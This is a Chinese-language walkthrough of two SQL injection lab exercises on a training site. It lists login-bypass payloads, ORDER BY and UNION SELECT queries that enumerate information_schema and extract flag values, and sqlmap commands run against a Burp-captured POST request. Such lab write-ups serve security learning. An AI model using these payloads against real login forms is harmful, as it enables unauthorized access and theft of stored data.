第一题:
1.判断是否存在SQL注入漏洞
用户名框输入 1’ or 1=1 — qwe(万能密码),提交,成功登陆。
显示Your Login name:admin,Your Password:as4dsa2dsad2a3
2.利用order by判断字段数
用户名框输入a’ or 1=1 order by 3 — qwe,提交,成功登陆。
用户名框输入a’ or 1=1 order by 4 — qwe,提交,账号密码错误。
说明有3个字段。
3.通过union联合查询,判断显错位
用户名框输入a’ union select 1,2,3 — qwe,提交,显示2,3,可见显错位为第2,3位。
4.判断表名。
用户名框输入a’ union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 — qwe ,得到表名flag
用户名框输入a’ union select 1,2,table_name from information_schema.tables where table_schema =database() limit 1,1 — qwe ,得到表名user
5.判断字段名。
用户名框输入 a’ union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 0,1 — qwe ,得到字段名ID
用户名框输入 a’ union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 1,1 — qwe ,得到字段名flag
6.寻找具体数据.
用户名框输入 a’ union select 1,2,flag from flag limit 0,1 — qwe ,得到zKaQ-PostK1
用户名框输入 a’ union select 1,2,flag from flag limit 1,1 — qwe ,得到zKaQ-XZT
用户名框输入 a’ union select 1,2,flag from flag limit 2,1 — qwe ,得到zKaQ-FlagA1
Sqlmap 做 post注入:
方法一:—form http://inject2.lab.aqlab.cn/Pass-05/index.php
方法二(建议使用):-r 抓数据包。打开网页,打开浏览器插件burp,打开burp软件,输入用户名密码提交,抓取数据包。复制到txt,把txt文件放在sql路径文件夹中。从该文件夹打开cmd命令行。输入python sqlmap.py -r 文件路径(可以直接把文件拖进cmd就出来了文件路径)→测试得到存在post注入→输入python sqlmap.py -r 文件路径(可以直接把文件拖进cmd就出来了文件路径) —dbs(—level 3 — risk 2)→得到库名→表名→字段名→拿数据。
第二题:
1.判断是否存在SQL注入漏洞
用户名框输入 1”) or 1=1 — qwe(万能密码),提交,成功登陆。
显示Your Login name:admin,Your Password:as4dsa2dsad2a3
2.利用order by判断字段数
用户名框输入a”) or 1=1 order by 3 — qwe,提交,成功登陆。
用户名框输入a”) or 1=1 order by 4 — qwe,提交,账号密码错误。
说明有3个字段。
3.通过union联合查询,判断显错位
用户名框输入a”) union select 1,2,3 — qwe,提交,显示2,3,可见显错位为第2,3位。
4.判断表名。
用户名框输入a”) union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 — qwe ,得到表名flag
用户名框输入a”) union select 1,2,table_name from information_schema.tables where table_schema =database() limit 1,1 — qwe ,得到表名user
5.判断字段名。
用户名框输入 a”) union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 0,1 — qwe ,得到字段名ID
用户名框输入 a”) union select 1,2,column_name from information_schema.columns where table_schema =database() and table_name=’flag’ limit 1,1 — qwe ,得到字段名flag
6.寻找具体数据.
用户名框输入 a”) union select 1,2,flag from flag limit 0,1 — qwe ,得到zKaQ-PostK1
用户名框输入 a”) union select 1,2,flag from flag limit 1,1 — qwe ,得到zKaQ-XZT
用户名框输入 a”) union select 1,2,flag from flag limit 2,1 — qwe ,得到zKaQ-FlagA1